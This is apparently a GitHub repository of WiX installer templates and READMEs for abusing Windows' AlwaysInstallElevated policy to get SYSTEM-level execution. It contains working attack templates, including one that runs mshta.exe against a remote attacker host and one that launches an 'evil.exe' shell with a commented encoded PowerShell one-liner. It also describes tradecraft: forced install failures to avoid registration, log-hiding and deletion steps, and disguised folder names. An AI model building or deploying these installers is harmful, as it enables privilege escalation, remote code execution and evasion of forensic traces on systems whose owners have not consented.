├── .gitignore
├── WXS-Templates
    ├── alwaysInstallElevated-1.wxs
    ├── alwaysInstallElevated-3.wxs
    ├── alwaysInstallElevated-5.wxs
    ├── README.md
    ├── alwaysInstallElevated-2.wxs
    └── alwaysInstallElevated-4.wxs
└── README.md


/.gitignore:
--------------------------------------------------------------------------------
1 | T/


--------------------------------------------------------------------------------
/WXS-Templates/alwaysInstallElevated-1.wxs:
--------------------------------------------------------------------------------
 1 | <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
 2 |     <Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="23e23deeqwddeweqwde" Version="0.0.1" Manufacturer="Test1" Language="1033">
 3 |         <Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package" />
 4 |         <Media Id='1' />
 5 |         <Directory Id="TARGETDIR" Name="SourceDir">
 6 |             <Directory Id="ProgramFilesFolder">
 7 |                 <Directory Id="INSTALLLOCATION" Name="Example">
 8 |                     <Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222" KeyPath="yes"></Component>
 9 |                 </Directory>
10 |             </Directory>
11 |         </Directory>
12 |         <Feature Id="DefaultFeature" Level="1">
13 |             <ComponentRef Id="ApplicationFiles" />
14 |         </Feature>
15 | 
16 |         <CustomAction 
17 |             Id="Shell" 
18 |             Execute="deferred"
19 |             Directory="TARGETDIR" 
20 |             Impersonate="no" 
21 |             ExeCommand="C:\Windows\System32\mshta.exe http://10.8.0.38:80/cute.png" 
22 |             Return="check" 
23 |         />
24 | 
25 |         <InstallExecuteSequence>
26 |             <Custom Action="Shell" After="InstallFiles"></Custom>
27 |         </InstallExecuteSequence>
28 |     </Product>
29 | </Wix>
30 | 


--------------------------------------------------------------------------------
/WXS-Templates/alwaysInstallElevated-3.wxs:
--------------------------------------------------------------------------------
 1 | <?xml version='1.0'?>
 2 | <Wix xmlns='http://schemas.microsoft.com/wix/2006/wi'>
 3 |    <Product Id='*' UpgradeCode="11111111-2222-3333-4444-555555555555" 
 4 |         Name='My Setup' Language='1033' Version='1.0.0.0' 
 5 |         Manufacturer='Your company'>
 6 | 
 7 |     <Package Description='pak' InstallerVersion='200' Compressed='yes' />
 8 | 
 9 |     <Media Id='1' Cabinet='setup.cab' EmbedCab='yes' />
10 | 
11 |     <Directory Id='TARGETDIR' Name='SourceDir'>
12 |         <Directory Id="TempFolder">
13 |             <Directory Id="INSTALLLOCATION" Name="~_tmpdir">
14 |                 <Component Id='MyComponent' DiskId='1' Guid=''>
15 |                     <File Id="File0" Name="setup.exe" Source="setup.exe" /> <!-- Put the executable on the same directory-->
16 |                 </Component>
17 |             </Directory>
18 |         </Directory>
19 |     </Directory>
20 | 
21 |     <Feature Id='InstallFeature' Title='Install Feature' Level='1'>
22 |         <ComponentRef Id='MyComponent' />
23 |     </Feature>
24 | 
25 |     <!-- Run Action -->
26 |     <!-- <CustomAction Id="RunWrapExe" Return="ignore" Execute="deferred"  -->
27 |     <CustomAction Id="RunWrapExe" Return="asyncNoWait" Execute="deferred" 
28 |                   FileKey="File0" ExeCommand="setup.exe param here"  
29 |                   HideTarget="no" Impersonate="no" />
30 | 
31 |     <InstallExecuteSequence>
32 |         <Custom Action="RunWrapExe" 
33 |                 After="InstallFiles">NOT REMOVE~="ALL"</Custom>
34 |     </InstallExecuteSequence>
35 |    </Product>
36 | </Wix>
37 | 


--------------------------------------------------------------------------------
/WXS-Templates/alwaysInstallElevated-5.wxs:
--------------------------------------------------------------------------------
 1 | <?xml version='1.0' ?>
 2 | <!--  
 3 |     Sabri Hassanyah (@KINGSABRI)
 4 |     A wxs template to embed executable (DLL) file into the msi package and execute it during installation. 
 5 | -->
 6 | 
 7 | <Wix xmlns='http://schemas.microsoft.com/wix/2006/wi'>
 8 |    <Product Id='*' UpgradeCode="11111111-2222-3333-4444-555555555555" 
 9 |         Name='My Setup' Language='1033' Version='1.0.0.0' 
10 |         Manufacturer='Your Company'>
11 | 
12 |     <Package Description='pak' InstallerVersion='200' Compressed='yes' />
13 |     <Media Id='1' Cabinet='setup.cab' EmbedCab='yes' />
14 |     
15 |     <!-- use a better naming (temp-like naming convention) ex. 4b494e47.icu-->
16 |     <Directory Id='TARGETDIR' Name='SourceDir'>
17 |         <Directory Id="TempFolder">
18 |             <Directory Id="INSTALLLOCATION" Name="VSTelem"> 
19 |                 <Component Id='MyComponent' DiskId='1' Guid=''>
20 |                     <File Id="File0" Name="smb64.exe" Source="smb64.exe" />
21 |                 </Component>
22 |             </Directory>
23 |         </Directory>
24 |     </Directory> 
25 |     
26 |     <Feature Id='InstallFeature' Title='Install Feature' Level='1'>
27 |         <ComponentRef Id='MyComponent' />
28 |     </Feature> 
29 |    
30 |     <!-- Run Action -->
31 |     <CustomAction 
32 |         Id='Installer' 
33 |         BinaryKey='MyBinaryID' 
34 |         DllEntry='MyDllEntryFunctionName' <!-- check your DLL entry -->
35 |         Impersonate='yes' 
36 |     />
37 |     <Binary Id='MyBinaryID' SourceFile='MyDLLFile.dll'/>
38 | 
39 |     <!-- Comment out unwanted actions -->
40 |     <InstallExecuteSequence>
41 |         <Custom Action="RunWrapped" After="InstallFiles">NOT REMOVE~="ALL"</Custom>
42 |     </InstallExecuteSequence>
43 |    </Product>
44 | </Wix>
45 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # MSI-AlwaysInstallElevated
 2 | A Collection of templates that can be used for abusing window's AlwaysInstallElevated policy
 3 | 
 4 | 
 5 | 
 6 | ## WXS Templates
 7 | 
 8 | * **alwaysInstallElevated-1.wxs** 
 9 |     * a wxs template to execute system commands.
10 | * **alwaysInstallElevated-2.wxs** 
11 |     * a wxs template to execute command then intentionally fails so it won't be registered as an installed program.
12 | * **alwaysInstallElevated-3.wxs** 
13 |     * a wxs template to embed executable (exe) file into the msi package and execute it during installation.
14 | * **alwaysInstallElevated-4.wxs** 
15 |     * a wxs template combines the techniques of `alwaysInstallElevated-2` and `alwaysInstallElevated-3` templates.
16 | 
17 | ### Instructions
18 | #### Windows
19 | 1. Change the first `ExeCommand` variable to desired command  
20 | 2. Download the [WiX Toolset Binaries](https://github.com/wixtoolset/wix3/releases/tag/wix3112rtm)
21 | 3. Compile alwaysInstallElevated.msi by running:  
22 | &nbsp;&nbsp;&nbsp;&nbsp;`candle alwaysInstallElevated.wxs`  
23 | &nbsp;&nbsp;&nbsp;&nbsp;`light alwaysInstallElevated.wixobj`  
24 | 4. Execute on target by running:  
25 | &nbsp;&nbsp;&nbsp;&nbsp;`alwaysInstallElevated.msi /q`
26 |     - or use `msiexec` implecitely 
27 |         
28 |         `msiexec /i alwaysInstallElevated.msi /qn`
29 |     - To uninstall it
30 |         
31 |         `msiexec /x alwaysInstallElevated.msi /qn`
32 | 
33 | #### Linux
34 | 1. Change the first 
35 | 2. Install wixl package
36 |     ```
37 |     sudo apt install wixl
38 |     ```
39 | 3. Compile the `.wsx` file
40 |     ```
41 |     wixl -v options.wsx -o alwaysInstallElevated.msi
42 |     ```
43 | 4. Execute on target by running:  
44 | &nbsp;&nbsp;&nbsp;&nbsp;`alwaysInstallElevated.msi /q`
45 |     - or use `msiexec` implecitely 
46 |         
47 |         `msiexec /i alwaysInstallElevated.msi /qn`
48 |     - To uninstall it
49 |         
50 |         `msiexec /x alwaysInstallElevated.msi /qn`
51 | 


--------------------------------------------------------------------------------
/WXS-Templates/README.md:
--------------------------------------------------------------------------------
 1 | # WXS Templates
 2 | 
 3 | ## Templates description 
 4 | 
 5 | ### ⟿ alwaysInstallElevated-1.wxs
 6 | a wxs template to execute system commands.
 7 | 
 8 | ### ⟿ alwaysInstallElevated-2.wxs
 9 | a wxs template to execute command then intentionally fails so it won't be registered as an installed program.
10 | 
11 | **Important Treadcraft:**
12 | 
13 | Although forcing MSI installation to fail saves us registring the package on the system,
14 | It leaves a log file `C:\Users\<User>\AppData\Local\Temp\<RandomName>.log*` for that failure on disk exposing details about the msi package
15 | example: 
16 | ```
17 |   Error 1721. There is a problem with this Windows Installer package. A program required for this install to complete could not be run. 
18 |   Contact your support personnel or package vendor. 
19 |   Action: z_gonna_fail, location: C:\Users\<User>\AppData\Local\Temp\<PATH>, command: C:\Users\<User>\AppData\Local\Temp\>PATH>\asdfasdfasdf.exe 
20 |   === Logging stopped: 8/5/2020  12:23:06 ===
21 | ```
22 | 
23 | To *partially* solve this issue, specify the log path to the current path with logging fatal errors only (then delete the log file yourself), as the following
24 | ```
25 | msiexec /i malware.msi /qn /Lm deleteme.log
26 | ```
27 | 
28 | ### ⟿ alwaysInstallElevated-3.wxs
29 | a wxs template to embed executable (exe) file into the msi package and execute it during installation.
30 | 
31 | ### ⟿ alwaysInstallElevated-4.wxs
32 | a wxs template combines the techniques of `alwaysInstallElevated-2`and `alwaysInstallElevated-3` templates.
33 | 
34 | 
35 | ### ⟿ alwaysInstallElevated-5.wxs
36 | a wxs template to embed executable (DLL) file into the msi package and execute it (based on its entry function) during installation.
37 | 
38 | ## Resources 
39 | * https://stackoverflow.com/questions/854873/how-to-make-an-msi-that-simply-wraps-an-exe-file
40 | * https://serverfault.com/questions/11670/the-corporate-benefits-of-using-msi-files/274609#274609
41 | * https://isc.sans.edu/forums/diary/Malware+Delivered+via+Windows+Installer+Files/23349/
42 | * https://wixtoolset.org/documentation/manual/v3/xsd/wix/customaction.html
43 | 


--------------------------------------------------------------------------------
/WXS-Templates/alwaysInstallElevated-2.wxs:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0"?>
 2 | <!-- Source: https://github.com/xan7r/Misc/blob/master/alwaysInstallElevated.wxs -->
 3 | <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
 4 |    <Product 
 5 |       Id="*" 
 6 |       UpgradeCode="12345678-1234-1234-1234-111111111111" 
 7 |       Name="Example Product Name" 
 8 |       Version="0.0.1" 
 9 |       Manufacturer="Example Company Name" 
10 |       Language="1033">
11 |       
12 |       <Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package" InstallPrivileges="elevated"/>
13 |       <Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
14 | 
15 | 
16 |       <Directory Id="TARGETDIR" Name="SourceDir">
17 |          <Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222"/>               
18 |       </Directory>
19 | 
20 |       <Feature Id="DefaultFeature" Level="1">
21 |          <ComponentRef Id="ApplicationFiles"/>
22 |       </Feature>
23 | 
24 | <!-- Execute SYSTEM shell back either via executable or powershell one-liner -->
25 | <!-- ExeCommand  ='powershell -nop -w hidden -enc SQBFAFgAIAAoACgAbgZA...cgBLwBhACcAKQAGHpAA==' -->
26 |       <CustomAction 
27 |          Id          ="a_system_shell"                     
28 |          Directory   ="TARGETDIR"
29 |          ExeCommand  ='C:\windows\tasks\evil.exe'
30 |          Return      ="asyncNoWait"
31 |          Execute     ="deferred"
32 |          Impersonate ="no"
33 |       />
34 | 
35 | <!-- Attempt to execute nonexistant program, which causes installer to fail, so example.msi won't be registered as an installed program -->
36 |       <CustomAction 
37 |          Id          ="z_gonna_fail"                     
38 |          Directory   ="TARGETDIR"
39 |          ExeCommand  ='C:\asdfasdfasdf.exe'
40 |          Return      ="check"
41 |          Execute     ="deferred"
42 |          Impersonate ="no"
43 |       />
44 | 
45 |    <InstallExecuteSequence>
46 |       <Custom Action="a_system_shell" After="InstallInitialize" /> 
47 |       <Custom Action="z_gonna_fail" Before="InstallFinalize" /> 
48 |    </InstallExecuteSequence>
49 |    
50 |    </Product>
51 | </Wix>
52 | 


--------------------------------------------------------------------------------
/WXS-Templates/alwaysInstallElevated-4.wxs:
--------------------------------------------------------------------------------
 1 | <?xml version='1.0'?>
 2 | <!--  
 3 |     Sabri Hassanyah (@KINGSABRI)
 4 |     A wxs template to embed executable (exe) file into the msi package and execute it during installation. 
 5 |     Additionally, it then intentionally fails so it won't be registered as an installed program.
 6 | -->
 7 | 
 8 | <Wix xmlns='http://schemas.microsoft.com/wix/2006/wi'>
 9 |    <Product Id='*' UpgradeCode="11111111-2222-3333-4444-555555555555" 
10 |         Name='My Setup' Language='1033' Version='1.0.0.0' 
11 |         Manufacturer='Your Company'>
12 | 
13 |     <Package Description='pak' InstallerVersion='200' Compressed='yes' />
14 |     <Media Id='1' Cabinet='setup.cab' EmbedCab='yes' />
15 |     
16 |     <!-- use a better naming (temp-like naming convention) ex. 4b494e47.icu-->
17 |     <Directory Id='TARGETDIR' Name='SourceDir'>
18 |         <Directory Id="TempFolder">
19 |             <Directory Id="INSTALLLOCATION" Name="VSTelem"> 
20 |                 <Component Id='MyComponent' DiskId='1' Guid=''>
21 |                     <File Id="File0" Name="smb64.exe" Source="smb64.exe" />
22 |                 </Component>
23 |             </Directory>
24 |         </Directory>
25 |     </Directory> 
26 |     
27 |     <Feature Id='InstallFeature' Title='Install Feature' Level='1'>
28 |         <ComponentRef Id='MyComponent' />
29 |     </Feature> 
30 |    
31 |     <!-- Run Action -->
32 |     <CustomAction 
33 |         Id="RunWrapped" 
34 |         Execute="deferred" 
35 |         Directory="INSTALLLOCATION"
36 |         Impersonate="no" 
37 |         ExeCommand="[INSTALLLOCATION]smb64.exe"
38 |         Return="asyncNoWait" 
39 |     /> 
40 |     
41 |     <!-- 
42 |         Important Treadcraft: 
43 |         Although forcing MSI installation to fail saves us registring the package on the system,
44 |         It leaves a log file *C:\Users\<User>\AppData\Local\Temp\<RandomName>.log* for that failure on disk exposing details about the msi package
45 |         example.log: 
46 |         ```
47 |         Error 1721. There is a problem with this Windows Installer package. A program required for this install to complete could not be run. 
48 |         Contact your support personnel or package vendor. 
49 |         Action: MicrosoftWindowsSystemIncrementalUpdate, location: C:\Users\<User>\AppData\Local\Temp\<PATH>, command: C:\Users\<User>\AppData\Local\Temp\>PATH>\MicrosoftWindowsSystemIncrementalUpdate.exe 
50 |         === Logging stopped: 8/5/2020  12:23:06 ===
51 |         ```
52 |         To partially solve this issue, specify the log path (to the current path then delete it yourself), as the following
53 |         ```
54 |         msiexec /i malware.msi /qn /Lm deleteme.log
55 |         ```
56 |     -->
57 |     <CustomAction 
58 |         Id          ="Fail"                     
59 |         Directory   ="INSTALLLOCATION"
60 |         ExeCommand  ='[INSTALLLOCATION]Fail.exe'
61 |         Execute     ="deferred"
62 |         Impersonate ="no"
63 |         Return      ="check"
64 |     />
65 | 
66 |     <!-- msf way -->
67 |   	<!-- <CustomAction Id='FailInstallation' Impersonate='no' Execute='deferred' Script='vbscript' Return='check'>fail</CustomAction> --> 
68 | 
69 |     <!-- Comment out unwanted actions -->
70 |     <InstallExecuteSequence>
71 |         <Custom Action="RunWrapped" After="InstallFiles">NOT REMOVE~="ALL"</Custom>
72 |         <Custom Action="Fail" Before="InstallFinalize" /> 
73 |     </InstallExecuteSequence>
74 |    </Product>
75 | </Wix>
76 | 


--------------------------------------------------------------------------------